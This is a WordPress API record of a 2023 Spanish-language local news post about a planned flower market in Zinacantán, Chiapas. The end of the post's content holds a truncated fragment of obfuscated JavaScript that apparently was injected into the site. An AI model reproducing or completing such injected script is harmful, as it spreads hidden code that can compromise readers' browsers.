{"id":10992,"date":"2023-07-18T03:53:53","date_gmt":"2023-07-18T03:53:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10992"},"modified":"2023-07-18T03:53:53","modified_gmt":"2023-07-18T03:53:53","slug":"zinacantan-tendra-el-mercado-de-flores-gracias-a-las-gestiones-del-alcalde","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10992","title":{"rendered":"Zinacant\u00e1n tendr\u00e1 el mercado de Flores, gracias a las gestiones del alcalde"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-17-at-12.45.02-PM-1.jpeg\" alt=\"\" class=\"wp-image-10993\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-17-at-12.45.02-PM-1.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-17-at-12.45.02-PM-1-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-17-at-12.45.02-PM-1-768x576.jpeg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>17 de Julio del 2023. Zinacant\u00e1n.- Gracias a las gestiones del presidente municipal de Zinacant\u00e1n, Mariano Francisco S\u00e1nchez Hern\u00e1ndez, este municipio Tsotsil contar\u00e1 con un Mercado de las Flores, demanda a\u00f1eja de miles de Pobladores.<\/p>\n\n\n\n<p>Luego de que est\u00e9 lunes, acudiera a este municipio \u00c1ngel Torres Culebro, Secretario de Obras P\u00fablicas, el alcalde agradeci\u00f3 al Gobernador del estado, Rutilio Escand\u00f3n Cadenas, por atender esta demanda a\u00f1eja de los pobladores, quienes desde el pasado mes de julio de 2022 se encuentra ofreciendo sus productos sin ning\u00fan espacio digno.<\/p>\n\n\n\n<p>De igual forma, el presidente hizo un reconocimiento al Secretaria para el Desarrollo Sustentable de los Pueblos Ind\u00edgenas (Sedespi), Emilio Ram\u00f3n Ram\u00edrez Guzm\u00e1n, por el acompa\u00f1amiento que les ha hecho para este logr\u00f3, as\u00ed como por todo el trabajo que viene realizando en favor de la poblaci\u00f3n Ind\u00edgena<\/p>\n\n\n\n<p>En este evento se inici\u00f3 el proceso de licitaci\u00f3n de la obra, y adem\u00e1s hicieron un recorrido por el terreno donde se ejecutar\u00e1; \u201cZinacant\u00e1n es una potencia tur\u00edstica, tiene su centro ceremonial aparte de sus templos, aparte de sus invernaderos, sus artesan\u00edas y aqu\u00ed se produce gran cantidad de verduras, por eso estamos luchando por la reconversi\u00f3n de la agricultura convencional, a la producci\u00f3n org\u00e1nica\u201d.<\/p>\n\n\n\n<p>S\u00e1nchez Hern\u00e1ndez adelant\u00f3 que posiblemente el pr\u00f3ximo 14 de agosto de este 2022, se estar\u00eda colocando la primera piedra para este mercado, d\u00f3nde se espera acuda el mandatario estatal.<\/p>\n\n\n\n<p>Finalmente agradeci\u00f3 al presidente de la Rep\u00fablica, Andr\u00e9s Manuel L\u00f3pez Obrador, por reafirmar sus ideales, y lograrse est\u00e1 Obra de impacto social, ya que los comerciantes hombres y mujeres, no tienen o no ten\u00edan un espacio digno donde ofrecer sus productos, siendo este municipio reconocido a nivel internacional por la producci\u00f3n de Flores.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 17 de Julio del 2023. Zinacant\u00e1n.- Gracias a las gestiones del presidente municipal de Zinacant\u00e1n, Mariano Francisco S\u00e1nchez Hern\u00e1ndez, este municipio Tsotsil contar\u00e1 con un Mercado de las Flores, demanda a\u00f1eja de miles de Pobladores. Luego de que est\u00e9 lunes, acudiera a este municipio \u00c1ngel Torres Culebro, Secretario de Obras P\u00fablicas, el alcalde &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10993,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10992","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10992","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10992"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10992\/revisions"}],"predecessor-version":[{"id":10994,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10992\/revisions\/10994"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10993"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10992"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10992"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10992"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}